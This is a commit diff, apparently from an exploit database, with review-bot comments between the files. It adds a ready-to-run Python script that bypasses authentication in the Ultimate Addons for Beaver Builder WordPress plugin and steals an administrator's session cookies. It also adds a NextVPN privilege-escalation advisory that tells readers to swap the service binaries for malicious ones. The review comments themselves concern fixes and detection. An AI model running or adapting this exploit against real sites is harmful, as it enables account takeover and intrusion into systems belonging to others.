DB: 2020-01-01
2 changes to exploits/shellcodes NextVPN v4.10 - Insecure File Permissions Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
parent
cd36764b57
commit
e976278a3f
3 changed files with 146 additions and 0 deletions
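--- a/exploits/php/webapps/47832.py
+++ b/exploits/php/webapps/47832.py
@@ -0,0 +1,76 @@
+# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
+# Date: 2019-12-21
+# Exploit Authors: Raphael Karger & Nathan Hrncirik
+# Vendor Homepage: https://www.ultimatebeaver.com/
+# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
+'''
+
+Requirements:
+* Valid Admin/User Email Needs to be Known
+* Social Media Login Form has to be Embedded in the Specified URL
+
+'''
+
+#!/usr/bin/python3
+
+import requests
+import urllib.parse
+import json
+import argparse
+
+banner = r''' ____ ___ _____ _______________________________ .__ .__ __
+| | \/ _ \\______ \______ \_ _____/__ _________ | | ____ |__|/ |_
+| | / /_\ \| | _/| | _/| __)_\ \/ /\____ \| | / _ \| \ __\
+| | / | \ | \| | \| \> < | |_> > |_( <_> ) || |
+|______/\____|__ /______ /|______ /_______ /__/\_ \| __/|____/\____/|__||__|
+\/ \/ \/ \/ \/|__|
+Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
+'''
+
+class exploit(object):
+def __init__(self, page, email):
+self.page = page
+self.sess = requests.Session()
+self.email = email
+self.nonce = False
+
+def get_nonce(self):
+try:
+nonce_req = self.sess.get(self.page)
+if nonce_req.text.find("data-nonce=") != -1:
+self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
+except Exception as e:
+print("Nonce Error: {}".format(e))
+
+def auth_bypass(self):
+try:
+schema = urllib.parse.urlparse(self.page)
+resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
+"action" : "uabb-lf-google-submit",
+"name" : "raphaelrocks",
+"email" : self.email,
+"nonce" : self.nonce
+})
+if resp.status_code == 200:
+print("Exploit Successful, Use the Cookies to Login: \n{}".format(
+json.dumps(self.sess.cookies.get_dict(), indent=4)
+))
+except Exception as e:
+print("Auth Bypass Error: {}".format(e))
+
+def begin_exploit(self):
+self.get_nonce()
+if self.nonce:
+print("Found Nonce: {}".format(self.nonce))
+self.auth_bypass()
+else:
+print("Failed to Gather Nonce")
+
+if __name__ == "__main__":
+print(banner)
+parser = argparse.ArgumentParser()
+parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
+parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
+args = parser.parse_args()
+ex = exploit(args.url, args.email)
+ex.begin_exploit()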
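Review bot: The header comment of 47832.py gives a defender nothing to act on: the title says `1.2.4.1` while the `# Version:` line says `< 1.2.4.1`, and neither a fixed release nor a detection hint is recorded. I would add `# Fixed in: 1.2.4.1 (inferred from the Version line; confirm against the vendor changelog)` and `# Detection: POST to /wp-admin/admin-ajax.php with action=uabb-lf-google-submit answered with login cookies for the supplied email`. In `auth_bypass`, `resp.status_code == 200` is printed as success although a 200 alone does not show that a session was issued, so a patched site can be misreported as vulnerable when this is used to verify a fix. The `#!/usr/bin/python3` line sits below the docstring and therefore has no effect as a shebang.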
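--- a/exploits/windows/local/47831.txt
+++ b/exploits/windows/local/47831.txt
@@ -0,0 +1,68 @@
+# Exploit Title: NextVPN v4.10 - Insecure File Permissions
+# Date: 2019-12-23
+# Exploit Author: SajjadBnd
+# Contact: blackwolf@post.com
+# Vendor Homepage: https://vm3max.site
+# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe
+# Version: 4.10
+# Tested on: Win10 Professional x64
+
+[ Description ]
+
+The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary.
+
+[ PoC ]
+
+C:\Users\user\AppData\Local\NextVPN>icacls *.exe
+
+Helper64.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+
+NextVPN.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+
+Proxifier.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+
+ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+
+Uninstall.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+
+Successfully processed 5 files; Failed processing 0 files
+and other Directories :
+
+>cd openconnect
+openconnect.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+Successfully processed 1 files; Failed processing 0 files
+
+
+>cd st
+
+st.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+Successfully processed 1 files; Failed processing 0 files
+
+>cd update
+
+update.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-5V14SL6\user:(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+[ Exploit -Privilege Escalation ]
+
+ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
+malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
+
+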
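Review bot: The escalation claim in `[ Exploit -Privilege Escalation ]` is not supported by the PoC output: the `icacls` listing is taken under `C:\Users\user\AppData\Local\NextVPN`, where full control for the owning user is expected, and nothing on the page shows a service or scheduled task that runs these binaries as SYSTEM or Administrator. The description should state which component runs elevated and from which path, e.g. `Affected service: <service name> runs <binary path> as LocalSystem (placeholder, to be confirmed by the author)`. A remediation line is also missing; something like `Mitigation: install elevated components outside the user profile and remove write access for non-admin users` would let readers act on the finding.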
|
@ -10854,6 +10854,7 @@ id,file,description,date,author,type,platform,port
|
|||
47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
|
||||
47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
|
||||
47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
|
||||
47831,exploits/windows/local/47831.txt,"NextVPN v4.10 - Insecure File Permissions",2019-12-31,SajjadBnd,local,windows,
|
||||
47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
|
||||
47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
|
||||
47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
|
||||
|
@ -42136,3 +42137,4 @@ id,file,description,date,author,type,platform,port
|
|||
47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,
|
||||
|
|
|